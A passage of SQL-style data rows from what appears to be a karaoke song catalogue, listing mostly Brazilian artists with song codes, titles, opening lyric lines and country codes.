'BRA'), (1230, 'Alexandre Pires-Fat Family', 6764, 'AO SENTIR O AMOR', 'A sensação de ver você chegar sinto as', 'BRA'), (1231, 'Gino e Geno', 6767, 'CARA DE BOI', 'Eu tô cansado da fazenda e...', 'BRA'), (1232, 'Fábio Jr.', 6792, 'SENTA AQUI', 'Senta aqui não tenha tanta ...', 'BRA'), (1233, 'Alexandre Pires', 6816, 'COISA DO DESTINO', 'Isso é coisa do destino eu ...', 'BRA'), (1234, 'Antônio Marcos', 6919, 'EU TENHO UM AMOR MELHOR QUE O SEU', 'Todo o amor que eu lhe dei você nem ligou', 'BRA'), (1235, 'Tânia Mara', 6932, 'LOUCA PAIXÃO', 'Você chegou e pôs em mim o seu olhar', 'BRA'), (1236, 'Zezé Di Camargo e Luciano', 6979, 'SERAFIM E SEUS FILHOS', 'São três machos e uma fêmea por sinal', 'BRA'), (1237, 'Alexandre Pires', 6988, 'TIRA ELA DE MIM', 'Tira a lembrança que ela deixou', 'BRA'), (1238, 'Peninha', 7055, 'AMO VOCÊ', 'Não me olhe assim desse jeito meu bem', 'BRA'), (1239, 'Ana Carolina-Seu Jorge', 7114, 'É ISSO AÍ', 'É isso aí... Como a gente achou ...', 'BRA'), (1240, 'Léo Jaime', 7176, 'MENSAGEM DE AMOR', 'Os livros na estante já não têm mais tanta', 'BRA'), (1241, 'Ivete Sangalo', 7227, 'QUANDO A CHUVA PASSAR', 'Pra que falar se você não quer...', 'BRA'), (1242, 'Papas da Língua', 7355, 'EU SEI', 'Eu sei... tudo pode acontecer eu sei nosso', 'BRA'), (1243, 'Tânia Mara', 7441, 'SE QUISER', 'Se quiser fugir pra qualquer lugar nem precisa', 'BRA'), (1244, 'Alexandre Pires', 7697, 'SEM TEU AMOR NADA É IGUAL', 'Me pego remexendo em suas coisas', 'BRA'), (1245, 'Charlie Brown Jr.', 7944, 'DIAS DE LUTA, DIAS DE GLÓRIA', 'Canto minha vida com orgulho tudo acontece', 'BRA'), (1246, 'Tânia Mara', 7967, 'FEBRE DE AMOR', 'E vai caindo a noite quase nem dá pra perceber', 'BRA'), (1247, 'Extreme', 9046, 'MORE THAN WORDS', 'Saying I love you', 'EUA'), (1248, 'Víctor e Léo', 9456, 'FADA', 'Fada fada querida dona da minha vida você se', 'BRA'), (1249, 'Alexandre Pires', 9575, 'A DEUS EU PEÇO', 'Que a menina dos meus olhos nunca venha', 'BRA'), (1250, 'Cezar e Paulinho', 9606, 'AMOR ALÉM DA VIDA', 'Imaginei andei e encontrei a minha outra parte', 'BRA'), (1251, 'Eduardo Costa', 9610, 'AMOR DE VIOLEIRO', 'Moça eu não sei falar coisas bonitas pra te', 'BRA'), (1252, 'Víctor e Léo', 9623, 'BORBOLETAS', 'Percebo que o tempo já não passa', 'BRA'), (1253, 'Alexandre Pires-Revelação', 9655, 'DELÍRIOS DE AMOR', 'Me lembro o dia que cheguei naquela festa', 'BRA'), (1254, 'Anitta', 15192, 'SHOW DAS PODEROSAS', 'Prepara que agora é hora do show das', 'BRA'), (1255, 'Paula Fernandes', 15197, 'UM SER AMOR', 'Você veio inteiro como o dia', 'BRA'), (1256, 'Marcos e Belutti', 15657, 'DOMINGO DE MANHÃ', 'Tá com voz de sono foi mal se te acordei', 'BRA'), (1257, 'Jads e Jadson', 15663, 'JEITO CARINHOSO', 'Como esquecer o beijo que você...', 'BRA'), (1258, 'Pablo', 15674, 'PORQUE HOMEM NÃO CHORA', 'Estou indo embora a mala já está lá fora', 'BRA'), (1259, 'Cristiano Araújo', 15686, 'CÊ QUE SABE', 'O que temos pra hoje é saudade', 'BRA'), (1260, 'Disney Frozen - Taryn Szpilman', 15829, 'LIVRE ESTOU', 'A neve branca brilhando no ...', 'BRA'), (1261, 'Marcos E Belutti - Wesley Safadão', 15842, 'AQUELE 1%', 'Eu abro a porta e puxo a cadeira do jantar', 'BRA'), (1262, 'Jads e Jadson', 15878, 'TOCA UM JOÃO MINEIRO E MARCIANO', 'Um dois três quatro copos já...', 'BRA'), (1263, 'Fernanda Takai - Padre Fábio De Melo', 15891, 'AMAR COMO JESUS AMOU', 'Um dia uma criança me parou...', 'BRA'), (1264, 'Tiziano Ferro', 15901, 'IMBRANATO', 'E''iniziato tutto per un tuo...', 'ITA'), (1265, 'Simone e Simaria', 15908, 'MEU VIOLÃO E O NOSSO CACHORRO', 'Pode ficar aqui sou eu quem vou...', 'BRA'), (1266, 'Tiago Iorc', 15961, 'AMEI TE VER', 'Ah quase ninguém vê', 'BRA'), (1267, 'Jorge e Mateus', 15965, 'SOSSEGUEI', 'Tô virado já tem uns três dias', 'BRA'), (1268, 'Maiara e Maraísa', 15966, '0.1', 'Tô escorada na mesa', 'BRA'), (1269, 'Marília Mendonça', 15971, 'INFIEL', 'Isso não é uma disputa', 'BRA'), (1270, 'Marcos e Belutti', 15975, 'ROMÂNTICO ANÔNIMO', 'Lembra daquele garoto que sentou do seu', 'BRA'), (1271, 'Suricato ', 15980, 'O SANFONEIRO SÓ TOCAVA ISSO', 'O baile lá na roça foi até o sol raiar', 'BRA'), (1272, 'Henrique e Juliano - Marília Mendonça', 16001, 'FLOR E O BEIJA-FLOR', 'Essa é uma velha história de uma flor', 'BRA'), (1273, 'Simone e Simaria', 16005, 'QUANDO O MEL É BOM', 'Ôôô ôô ôô... Quando o mel é bom a abelha', 'BRA'), (1274, 'Naiara Azevedo - Maiara e Maraísa', 16008, '50 REAIS', 'Que cena mais linda será que eu estou', 'BRA'), (1275, 'Sandy - Tiago Iorc', 16011, 'ME ESPERA', 'Eu ainda estou aqui perdido em mil versões', 'BRA'), (1276, 'Wanessa Camargo', 16026, 'CORAÇÃO EMBRIAGADO', 'Te desejo uma insônia cheia de lembranças minhas', 'BRA'), (1277, 'Maiara e Maraísa', 16047, 'MEDO BOBO', 'Iê iê iê... Ah esse tom de voz eu reconheço', 'BRA'), (1278, 'Jason Mraz', 19081, '93 MILLION MILES', 'Ninety three million miles...', 'EUA'), (1279, 'Ed Sheeran', 19408, 'PHOTOGRAPH', 'Loving can hurt loving can...', 'EUA'), (1280, 'Nara Leão', 3941, 'A BANDA', 'Eu estava à toa na vida...', 'BRA'), (1281, 'Banda Cheiro de Amor', 3942, 'A DANÇA DA SENSUAL', 'Veja a nova dança que eu vou te mostrar', 'BRA'), (1282, 'Os Vips', 3943, 'A VOLTA', 'Estou guardando o que há de bom em mim', 'BRA'), (1283, 'Banda Cheiro de Amor', 3944, 'ABRE CORAÇÃO', 'Meu amor, estou tão sozinha', 'BRA'), (1284, 'Dalvan', 3945, 'AGORA OU NUNCA', 'Agora ou nunca vem me abraçar', 'BRA'), (1285, 'Caetano Veloso', 3947, 'ALEGRIA ALEGRIA', 'Caminhando contra o vento, sem lenço', 'BRA'), (1286, 'Banda Eva', 3948, 'ARERÊ', 'Tudo que eu quero nessa vida', 'BRA'), (1287, 'Ivan Lins', 3949, 'BANDEIRA DO DIVINO', 'Os devotos do divino vão abrir...', 'BRA'), (1288, 'Lulu Santos', 3950, 'CADÊ VOCÊ', 'Onde está você é o que eu quero saber', 'BRA'), (1289, 'É o Tchan', 3952, 'DISQUE TCHAN (ALÔ, É TCHAN)', 'Pega no compasso no passo dessa', 'BRA'), (1290, 'Art Popular', 3953, 'PÉTALAS DE ROSAS', 'ah ah... Desejo de amor eu vou te amar', 'BRA'), (1291, 'Ronaldo e os Barcelos', 3954, 'FELIZ ANIVERSÁRIO', 'Feliz aniversário meu amor', 'BRA'), (1292, 'Banda Magníficos', 3955, 'FORA DE MIM', 'Pensei demais, e resolvi tirar você do', 'BRA'), (1293, 'Rádio Táxi', 3956, 'GAROTA DOURADA', 'Navegando no teu mar flutuando no teu', 'BRA'), (1294, 'Biquini Cavadão', 3957, 'JANAÍNA', 'Janaína acorda todo dia às quatro e', 'BRA'), (1295, 'Ricky Martin', 3958, 'LA COPA DE LA VIDA', 'La vida es pura pasion', 'ESP'), (1296, 'Banda Magníficos', 3959, 'MEU TESÃO É VOCÊ', 'Quando você me olha, amor', 'BRA'), (1297, 'Martinho da Vila', 3960, 'MINHA E TUA', 'Deus abençoa porquê', 'BRA'), (1298, 'Só Pra Contrariar', 3961, 'MINHA METADE', 'Será que a gente entrega o coração', 'BRA'), (1299, 'Soweto', 3962, 'MUNDO DE OZ', 'A alegria brilhou no olhar', 'BRA'), (1300, 'Sandra de Sá-Tim Maia', 3963, 'NÃO TEM SAÍDA', 'Eu errei... Mas jogue a primeira pedra quem', 'BRA'), (1301, 'Djavan', 3964, 'NEM UM DIA', 'Um dia frio um bom lugar pra ler um livro', 'BRA'), (1302, 'Kleiton e Kledir', 3967, 'PAIXÃO', 'Oh... Amo tua voz e tua cor...', 'BRA'), (1303, 'Engenheiros do Hawaí', 3969, 'PRA SER SINCERO', 'Pra ser sincero não espero ...', 'BRA'), (1304, 'Gian e Giovani', 3970, 'QUE RAIO DE AMOR É ESSE', 'Que raio de amor é esse...', 'BRA'), (1305, 'Soweto', 3971, 'REFÉM DO CORAÇÃO', 'Sempre alguém me desperta', 'BRA'), (1306, 'Bruno e Marrone', 3972, 'REI DO RODEIO', 'Eu sou peão, sou cabra macho', 'BRA'), (1307, 'Biafra (Byafra)', 3973, 'RUA RAMALHETE', 'Sem querer fui me lembrar', 'BRA'), (1308, 'Tom Jobim', 3974, 'SAMBA DE UMA NOTA SÓ', 'Eis aqui este sambinha feito de uma', 'BRA'), (1309, 'Companhia do Pagode', 3975, 'SANDUÍCHE', 'Tá chegando pra ficar todo mundo vai', 'BRA'), (1310, 'Negritude Júnior', 3976, 'SAUDADE E SOLIDÃO', 'Tentei me encontrar no teu...', 'BRA'), (1311, 'Roberta Miranda', 3977, 'SEMPRE MAIS', 'Sinto... você insiste em dizer', 'BRA'), (1312, 'Ara Ketu', 3978, 'TÁ NA CARA', 'Basta uma brisa da praia', 'BRA'), (1313, 'Limão com Mel', 3979, 'TODA SUA', 'Eu quero viajar no teu prazer', 'BRA'), (1314, 'Rádio Táxi', 3980, 'UM AMOR DE VERÃO', 'Um amor de verão tem um sol particular', 'BRA'), (1315, 'O Rappa', 3981, 'A FEIRA', 'É dia de feira', 'BRA'), (1316, 'Roberta Miranda', 3982, 'A MULHER EM MIM', 'Em meu coração os amores vêm e vão', 'BRA'), (1317, 'Banda Beijo', 3983, 'A VIDA É FESTA', 'Amor quero sentir o teu perfume', 'BRA'), (1318, 'Terrasamba', 3984, 'ABC DO TERRA', 'Você me disse que sabe sambar', 'BRA'), (1319, 'Roberto Carlos', 3985, 'ABRÁZAME ASÍ', 'Abrázame así...', 'ESP'), (1320, 'Ricardo Chaves', 3986, 'ACABOU', 'Eu tenho andado meio preocupado', 'BRA'), (1321, 'Banda Magníficos', 3987, 'ADORO', 'Adoro... esse teu corpo quente', 'BRA'), (1322, 'Bruno e Marrone', 3988, 'ALÇAPÃO', 'Você acha fácil chegar dizendo que', 'BRA'), (1323, 'João Paulo e Daniel', 3989, 'AS COISAS SÃO COMO SÃO', 'Às vezes quando a gente...', 'BRA'), (1324, 'Ara Ketu', 3990, 'AURORA', 'Como eu vou ficar, amor', 'BRA'), (1325, 'Molejo', 3991, 'BRINCADEIRA DE CRIANÇA', 'Acorda criançada', 'BRA'), (1326, 'Paralamas do Sucesso', 3992, 'BUSCA VIDA', 'Vou sair pra ver o céu', 'BRA'), (1327, 'Angélica', 3993, 'CIÚME', 'Eu queria entender direito essa paixão', 'BRA'), (1328, 'Roberto Carlos', 3994, 'CORRO DEMAIS', 'Meu bem qualquer instante que eu fico', 'BRA'), (1329, 'Soweto', 3995, 'DERÊ', 'Derê, derê rê rê... Quero você pra sentir', 'BRA'), (1330, 'Leandro e Leonardo', 3996, 'DEU MEDO', 'Deu medo... Quando você...', 'BRA'), (1331, 'Paralamas do Sucesso', 3997, 'ELA DISSE ADEUS', 'Ela disse adeus Let her get on with li', 'BRA'), (1332, 'Kiloucura', 3998, 'FALANDO SÉRIO', 'Só se eu fosse louco...', 'BRA'), (1333, 'Roberto Carlos', 3999, 'FERA FERIDA', 'Acabei com tudo, escapei com vida', 'BRA'), (1334, 'Lulu Santos', 4001, 'HIPER CONECTIVIDADE', 'Acho que dessa vez eu vi algo', 'BRA'), (1335, 'Banda Eva', 4002, 'LEVADA LOUCA', 'Shake, shake, shake... Tem festa no candeal', 'BRA'), (1336, 'Terrasamba', 4003, 'LIBERAR GERAL', 'Nada mal, curtir o terra samba não é nada', 'BRA'), (1337, 'Donato e Estefano', 4005, 'MI DIOS Y MI CRUZ', 'Uh... uh... Sera que el tiempo tiener mil', 'ESP'), (1338, 'Chrystian e Ralf', 4006, 'MINHA GIOCONDA (MIA GIOCONDA)', 'Do dia que nascemos e vivemos para o', 'BRA'), (1339, 'Netinho', 4007, 'PARAÍSO', 'Sol de verão quando bate em minhas', 'BRA'), (1340, 'Zeca Pagodinho', 4008, 'POSSO ATÉ ME APAIXONAR', 'Gosto que me enrosco de um rabo de saia', 'BRA'), (1341, 'Zezé Di Camargo e Luciano', 4009, 'PRIMEIRO AMOR', 'Eu quero te ver, eu quero saber', 'BRA'), (1342, 'Barão Vermelho', 4010, 'PURO ÊXTASE', 'Toda brincadeira não devia ter hora', 'BRA'), (1343, 'Placa Luminosa', 4012, 'SEGREDO', 'Hoje teu segredo é meu segredo somos', 'BRA'), (1344, 'Só no Sapatinho', 4014, 'SÓ NO SAPATINHO', 'Ela chega vaidosa e sorridente', 'BRA'), (1345, 'Fanzine', 4016, 'UMA ESTÓRIA DE AMOR', 'Deixa eu lembrar de você,', 'BRA'), (1346, 'Sandra de Sá', 4017, 'VAMOS VIVER', 'Vamos consertar o mundo', 'BRA'), (1347, 'Latino', 4018, 'VITRINE', 'Nem mesmo lá no Hawai, tem...', 'BRA'), (1348, 'Roupa Nova', 4020, 'VOCÊ NO CORAÇÃO', 'Não sei por que insisto tanto assim', 'BRA'), (1349, 'Os Abelhudos', 4024, 'AO MESTRE COM CARINHO', 'Quero aprender sua lição...', 'BRA'), (1350, 'Banda Magníficos', 4025, 'APAIXONADO', 'Quero, quero tanto ter você pra mim', 'BRA'), (1351, 'Terrasamba', 4027, 'CARRINHO DE MÃO', 'Padá badá... Essa é a onda do carrinho', 'BRA'), (1352, 'Leandro e Leonardo', 4028, 'CHUVA DE LÁGRIMAS', 'Eu vejo a chuva caindo sem...', 'BRA'), (1353, 'Titãs', 4033, 'É PRECISO SABER VIVER', 'Quem espera que a vida seja feita de', 'BRA'), (1354, 'Sandy e Júnior', 4034, 'EM CADA SONHO', 'Cada vez que eu penso te sinto, te ve', 'BRA'), (1355, 'Fafá de Belém', 4035, 'ETERNAMENTE', 'Só mesmo o tempo pode revelar', 'BRA'), (1356, 'Mel Com Terra', 4036, 'EU, VOCÊ E O AMOR', 'Lembro do dia em que eu te conheci', 'BRA'), (1357, 'Milton Nascimento', 4037, 'FÉ CEGA FACA AMOLADA', 'Agora não pergunto mais aonde vai a', 'BRA'), (1358, 'Karametade', 4038, 'GRITO DE PAIXÃO', 'Ilusão é uma flor no meio de...', 'BRA'), (1359, 'Vinny', 4039, 'HELOÍSA, MEXE A CADEIRA', 'Mexe a cadeira e bota na beira da sala', 'BRA'), (1360, 'Renato Russo', 4040, 'LA FORZA DELLA VITA', 'Anche quando ci buttiamo via per rabbia o per', 'ITA'), (1361, 'Ara Ketu', 4041, 'MAL ACOSTUMADO', 'Amor de verdade eu só senti', 'BRA'), (1362, 'Soweto-Neguinho da Beija Flor', 4042, 'NEGRA ÂNGELA', 'Eu prefiro acreditar que é mentira', 'BRA'), (1363, 'Negritude Júnior', 4043, 'O BEIJO', 'Beijo agarradinho beijo estaladinho', 'BRA'), (1364, 'Maria Bethânia', 4044, 'OLHA', 'Olha, você tem todas as coisas', 'BRA'), (1365, 'Art Popular', 4045, 'PAGODE DA AMARELINHA', 'Pagode da amarelinha', 'BRA'), (1366, 'João Bosco', 4046, 'PAPEL MACHÊ', 'Cores do mar festa do sol...', 'BRA'), (1367, 'Só Pra Contrariar', 4047, 'PECADO CAPITAL', 'Dinheiro na mão é vendaval', 'BRA'), (1368, 'Maurício Mattar', 4048, 'PRA FICAR CONTIGO', 'Ai que vontade de te ver de novo', 'BRA'), (1369, 'Peninha', 4050, 'QUAL CARÍCIA', 'Você faz tudo que eu gosto', 'BRA'), (1370, 'Raça Negra', 4052, 'SERÁ', 'Tire suas mãos de mim', 'BRA'), (1371, 'Skank', 4053, 'SIDERADO', 'Porque eu te espero na neblina', 'BRA'), (1372, 'Engenheiros do Hawaí', 4054, 'SOMOS QUEM PODEMOS SER', 'Um dia me disseram que as nuvens não eram', 'BRA'), (1373, 'Daniela Mercury', 4055, 'SWING DA COR', 'Não, não me abandone não me desespere', 'BRA'), (1374, 'Maria Bethânia', 4057, 'TIGRESA', 'Uma tigresa de unhas negras', 'BRA'), (1375, 'Ritchie', 4058, 'TRANSAS', 'Tanto tempo faz que a gente transa', 'BRA'), (1376, 'Paulo Ricardo', 4059, 'TUDO POR NADA', 'Se eu soubesse que ia ser assim', 'BRA'), (1377, 'Amado Batista', 4060, '24 HORAS NO AR', 'Pare de pensar em besteira', 'BRA'), (1378, 'É o Tchan', 4061, 'A NOVA LOIRA DO TCHAN', 'Luz na passarela que lá vem ela', 'BRA'), (1379, 'Elba Ramalho', 4062, 'AI QUE SAUDADE D''OCÊ', 'Não se admire se um dia um ...', 'BRA'), (1380, 'Guilherme Arantes', 4064, 'AMANHÃ', 'Amanhã será um lindo dia da...', 'BRA'), (1381, 'Banda Cheiro de Amor', 4066, 'AVIÃOZINHO', 'Voa, voa aviãozinho vai buscar o meu', 'BRA'), (1382, 'Banda Eva', 4068, 'CARRO VELHO', 'Cheiro de pneu queimado', 'BRA'), (1383, 'Exaltasamba', 4069, 'CARTÃO POSTAL', 'Como sempre distraída te filmei e', 'BRA'), (1384, 'Raul Seixas', 4070, 'COMO VOVÓ JÁ DIZIA', 'Quem não tem colírio usa óculos escuro', 'BRA'), (1385, 'Alceu Valença', 4071, 'CORAÇÃO BOBO', 'Meu coração tá batendo', 'BRA'), (1386, 'Daniel', 4072, 'DECLARAÇÃO DE AMOR', 'Minha vida e o meu mundo', 'BRA'), (1387, 'Eliana e Molejo', 4073, 'DIA DE ALEGRIA', 'Lala laia laia laiala... Hoje ...', 'BRA'), (1388, 'Luís Miguel', 4075, 'EL DIA QUE ME QUIERAS', 'Acaricia mi sueno el suave murmullo', 'ESP'), (1389, 'Pe. Fábio de Mello', 4078, 'ERGUEI AS MÃOS O SENHOR TEM MUITOS FILHOS', 'Erguei as mãos e dai glória a Deus', 'BRA'), (1390, 'Chitãozinho e Xororó', 4080, 'EU MENTI', 'Eu menti pra você quando disse que tinha', 'BRA'), (1391, 'Placa Luminosa', 4081, 'FICA COMIGO', 'Amo você fica comigo', 'BRA'), (1392, 'Fat Family', 4083, 'JEITO SEXY', 'Ó baby dance, dance, dance', 'BRA'), (1393, 'Luiz Melodia', 4084, 'JUVENTUDE TRANSVIADA', 'Lava roupa todo dia que agonia', 'BRA'), (1394, 'Fábio Jr.', 4085, 'NA CANÇÃO', 'Isso é pra quem não acredita', 'BRA'), (1395, 'Negritude Júnior', 4086, 'NOSSA CAMA É UMA LOUCURA', 'Quando as palavras se cruzam...', 'BRA'), (1396, 'Roberto Carlos', 4087, 'NOSSA SENHORA', 'Cubra-me com seu manto de amor', 'BRA'), (1397, 'Zeca Pagodinho', 4088, 'O DONO DA DOR', 'Queria felicidade, não pra me apaixonar', 'BRA'), (1398, 'Gian e Giovani', 4089, 'O GRANDE AMOR DA MINHA VIDA', 'A gente morou e cresceu na...', 'BRA'), (1399, 'Katinguelê', 4090, 'PERTINHO', 'Te sinto tão pertinho quando...', 'BRA'), (1400, 'Elymar Santos', 4091, 'PÔXA', 'Pôxa... Como foi bacana te ...', 'BRA'), (1401, 'Natiruts (Nativus)', 4092, 'PRESENTE DE UM BEIJA-FLOR', 'O beija-flor que trouxe meu amor', 'BRA'), (1402, 'Novos Baianos', 4093, 'PRETA, PRETINHA', 'Preta, preta, pretinha... Enquanto eu corria', 'BRA'), (1403, 'Companhia do Pagode', 4094, 'PSIU, PSIU', 'Psiu, psiu... Coisinha linda do bumbum', 'BRA'), (1404, 'Tânia Alves', 4095, 'SABOR DE MIM', 'Quanto tempo desfrutamos desse amor', 'BRA'), (1405, 'Benito Di Paula', 4097, 'SE NÃO FOR AMOR', 'Você me olha desse jeito', 'BRA'), (1406, 'Vinny', 4098, 'SHAKE BOOM', 'Yeh a ha bota lenha na fogueira', 'BRA'), (1407, 'Os Morenos', 4099, 'TÔ DENTRO, TÔ FORA', 'Ai ai ai ai... Festa de aniversário tô dentro', 'BRA'), (1408, 'Legião Urbana', 4101, 'ANTES DAS SEIS', 'Quem inventou o amor?...', 'BRA'), (1409, 'Roupa Nova', 4102, 'BEM MAIOR', 'Bem maior do que os mares mais profundos', 'BRA'), (1410, 'Roupa Nova', 4104, 'CLAREAR', 'Clarear baby clarear', 'BRA'), (1411, 'Alejandro Sanz', 4105, 'CORAZÓN PARTÍO', 'Tiritas pa este corazón partío', 'ESP'), (1412, 'Banda Eva', 4106, 'DE LADINHO', 'Não vou ficar sozinha', 'BRA'), (1413, 'Leno e Lilian', 4107, 'DEVOLVA-ME', 'Rasgue as minhas cartas e...', 'BRA'), (1414, 'Fábio Jr.', 4108, 'DOU MINHA PALAVRA', 'Sabe a madrugada faz barulho', 'BRA'), (1415, 'Maria Bethânia', 4109, 'É O AMOR', 'Eu não vou negar que sou louco por você', 'BRA'), (1416, 'Djavan', 4111, 'EU TE DEVORO', 'Teus sinais me confundem', 'BRA'), (1417, 'Jota Quest', 4112, 'FÁCIL', 'Tudo é tão bom e azul e calmo...', 'BRA'), (1418, 'Fafá de Belém', 4113, 'FOI ASSIM', 'Foi assim, como um resto de sol no mar', 'BRA'), (1419, 'Debora Blando', 4115, 'INDIVISÍVEL', 'Corre em minhas veias sonhos ancestrais', 'BRA'), (1420, 'Clara Nunes', 4117, 'LAMA', 'Pelo curto tempo que você sumiu', 'BRA'), (1421, 'Natiruts (Nativus)', 4118, 'LIBERDADE PRA DENTRO DA CABEÇA', 'Liberdade pra dentro da cabeça', 'BRA'), (1422, 'Eduardo Dusek', 4119, 'AVENTURA (LUZ DE VELAS)', 'Oh, oh, oh... Vi seu olhar, seu olhar de festa', 'BRA'), (1423, 'Soweto', 4120, 'MAÇÃ DO AMOR', 'O seu nome eu anotei na minha agenda', 'BRA'), (1424, 'Pepê e Nenem', 4121, 'MANIA DE VOCÊ', 'Por que você não vem ficar comigo', 'BRA'), (1425, 'Exaltasamba', 4122, 'ME APAIXONEI PELA PESSOA ERRADA', 'Eu não tenho culpa de estar te amando', 'BRA'), (1426, 'Biafra (Byafra)', 4123, 'MOLDURA', 'O tempo passa e a gente', 'BRA'), (1427, 'Benito Di Paula', 4124, 'MULHER BRASILEIRA', 'Agora chegou a vez vou cantar', 'BRA'), (1428, 'Renato e Seus Blue Caps', 4125, 'NÃO TE ESQUECEREI', 'Não te esquecerei meu eterno amor', 'BRA'), (1429, 'Daniel', 4126, 'PAIXÃO CAIPIRA', 'Vou pela estrada da minha saudade', 'BRA'), (1430, 'Banda Beijo', 4127, 'PERAÊ', 'Pára de sorrir se não te agarro', 'BRA'), (1431, 'Gal Costa', 4128, 'PRA VOCÊ', 'Pra você eu guardei um amor...', 'BRA'), (1432, 'Léo Jaime', 4129, 'PRECISO DIZER QUE TE AMO', 'Quando a gente conversa', 'BRA'), (1433, 'Altemar Dutra', 4130, 'QUE QUERES TU DE MIM?', 'Que queres tu de mim? que fazes junto', 'BRA'), (1434, 'Eliana de Lima', 4131, 'QUERO FICAR COM VOCÊ', 'Ah!... Os meus olhos querem', 'BRA'), (1435, 'Skank', 4132, 'SAIDEIRA', 'Tem um lugar diferente lá depois da s', 'BRA'), (1436, 'Claudinho e Buchecha', 4133, 'SÓ LOVE', 'Só love só love só love só love', 'BRA'), (1437, 'Os Morenos', 4135, 'TÁ A FIM DE SAMBAR', 'Tá a fim de sambar já pode chegar', 'BRA'), (1438, 'Laura Pausini', 4136, 'UN''EMERGENZA D''AMORE', 'E un''emergenza d''amore il...', 'ITA'), (1439, 'Tim Maia', 4137, 'VALE TUDO', 'Vale, vale tudo vale, vale tudo', 'BRA'), (1440, 'Adriana Calcanhoto', 4138, 'VAMBORA', 'Entre por essa porta agora', 'BRA'), (1441, 'Zezé Di Camargo e Luciano', 4140, 'VOLTA PRO MEU CORAÇÃO', 'Noite fria triste céu cinzento', 'BRA'), (1442, 'Asa de Águia', 4141, 'A DANÇA DO VAMPIRO', 'Você é o amor que eu sempre quis ter', 'BRA'), (1443, 'Gian e Giovani', 4142, 'AMOR DE VERDADE', 'A gente se esbarrou por aí...', 'BRA'), (1444, 'Leandro e Leonardo', 4143, 'AMOR DIVIDIDO', 'Se for pra ter você comigo e...', 'BRA'), (1445, 'Ronnie Von', 4145, 'CACHOEIRA', 'Tantos mistérios pra desvendar', 'BRA'), (1446, 'Fernando Mendes', 4146, 'CADEIRA DE RODAS', 'Sentada na porta', 'BRA'), (1447, 'Roberto Carlos', 4147, 'CAMINHONEIRO', 'Todo dia quando eu pego a estrada', 'BRA'), (1448, 'Elba Ramalho', 4148, 'CASA, COMIDA E PAIXÃO', 'Lá se vai o meu amor', 'BRA'), (1449, 'Andrea Bocelli', 4150, 'CON TE PARTIRO', 'Quando sono solo sogno all''orizzonte', 'ITA'), (1450, 'Daniel', 4152, 'DENGO', 'Vem cá meu dengo vem comigo pro chamego', 'BRA'), (1451, 'Roberta Miranda', 4153, 'É AMOR DEMAIS', 'Oh amor devemos conversar eu sinto que é', 'BRA'), (1452, 'Elymar Santos', 4155, 'ESCANCARANDO DE VEZ', 'Tem certas coisas, que são ...', 'BRA'), (1453, 'Sandy e Júnior', 4156, 'ETC... E TAL', 'Quando eu encontrar um amor pra mim', 'BRA'), (1454, 'Negritude Júnior', 4157, 'FAÇA O QUE EU DIGO', 'Jogue a tristeza fora a turma...', 'BRA'), (1455, 'Netinho', 4158, 'INDECISÃO', 'Não dá pra viver sem você', 'BRA'), (1456, 'Adriana Calcanhoto', 4160, 'MAIS FELIZ', 'O nosso amor não vai parar ...', 'BRA'), (1457, 'Os Morenos', 4162, 'MINA DE FÉ', 'Eu era feliz sem saber', 'BRA'), (1458, 'Maurício Manieri', 4163, 'MINHA MENINA', 'Vem ser minha menina', 'BRA'), (1459, 'Reginaldo Rossi', 4164, 'MON AMOUR, MEU BEM, MA FEMME', 'Nesse corpo meigo e tão pequeno', 'BRA'), (1460, 'Chitãozinho e Xororó', 4165, 'NA ABA DO MEU CHAPÉU', 'Ela me abraçou, me deu um beijo de mel', 'BRA'), (1461, 'Soweto', 4166, 'NÃO FOI À TOA', 'Amor mais uma vez eu me atrasei', 'BRA'), (1462, 'Ed Motta-Flávio Venturini', 4167, 'NASCENTE', 'Clareia manhã o sol vai esconder a clara', 'BRA'), (1463, 'Os Travessos', 4170, 'QUANDO A GENTE AMA', 'Não sei o que é que falta', 'BRA'), (1464, 'Nana Caymmi', 4171, 'RESPOSTA AO TEMPO', 'Batidas na porta da frente', 'BRA'), (1465, 'José Augusto', 4172, 'SÁBADO', 'Todo sábado é assim eu me...', 'BRA'), (1466, 'Art Popular', 4173, 'SAI DA FRENTE', 'Amor eu não consigo viver mais sozinho', 'BRA'), (1467, 'Só Pra Contrariar', 4174, 'SAI DA MINHA ABA', 'Sai pra lá se manca vê se me esquece', 'BRA'), (1468, 'Zeca Pagodinho', 4176, 'SEU BALANCÊ', 'Quando o canto da sereia', 'BRA'), (1469, 'Peninha', 4177, 'SÓ EU E VOCÊ', 'Não sei se é de noite...', 'BRA'), (1470, 'Ney Matogrosso', 4179, 'TANTO AMAR', 'Amo tanto e de tanto amar', 'BRA'), (1471, 'Engenheiros do Hawaí', 4180, 'TODA FORMA DE PODER', 'Eu presto atenção no que eles dizem', 'BRA'), (1472, 'Roberta Miranda', 4181, 'AMANHÃ', 'Me prendeste numa redoma', 'BRA'), (1473, 'Frank Aguiar', 4183, 'CASADO TAMBÉM NAMORA', 'Eu sou casado mas sou homem cem por', 'BRA'), (1474, 'Fábio Jr.', 4185, 'COMPROMISSO', 'A gente tem um compromisso ...', 'BRA'), (1475, 'Zezé Di Camargo e Luciano', 4186, 'DOIS CORAÇÕES E UMA HISTÓRIA', 'No meio da conversa um caso', 'BRA'), (1476, 'Fagner', 4187, 'ESPUMAS AO VENTO', 'Sei que aí dentro ainda mora um peda', 'BRA'), (1477, 'Sem Compromisso', 4188, 'ETERNAMENTE', 'Não sei como explicar', 'BRA'), (1478, 'Tim Maia', 4189, 'EU AMO VOCÊ', 'Toda vez que eu olho', 'BRA'), (1479, 'Kid Abelha', 4192, 'EU SÓ PENSO EM VOCÊ', 'Saí de casa a procura de...', 'BRA'), (1480, 'Daniela Mercury', 4193, 'FEIJÃO DE CORDA', 'Compraria o mundo inteiro', 'BRA'), (1481, 'Gal Costa', 4194, 'FOLHETIM', 'Se acaso me quiseres, sou...', 'BRA'), (1482, 'Legião Urbana', 4195, 'GIZ', 'Mesmo sem te ver acho ao...', 'BRA'), (1483, 'Alcione-Djavan', 4196, 'GOSTOSO VENENO', 'Esse amor me envenena', 'BRA'), (1484, 'Fat Family', 4197, 'GULOSA', 'U hu a ha... Vem só você sabe como fazer', 'BRA'), (1485, 'Vanessa Rangel', 4198, 'LEVE-ME DAQUI', 'Leve-me daqui... breve', 'BRA'), (1486, 'Só Pra Contrariar', 4199, 'MACHUCA DEMAIS', 'Você machuca demais esse meu coração', 'BRA'), (1487, 'Pepê e Nenem', 4200, 'MAIS UMA VEZ', 'Eu sei que dá', 'BRA'), (1488, 'Grupo Desejos', 4201, 'MEL NA MINHA BOCA', 'Olha a gente tem que...', 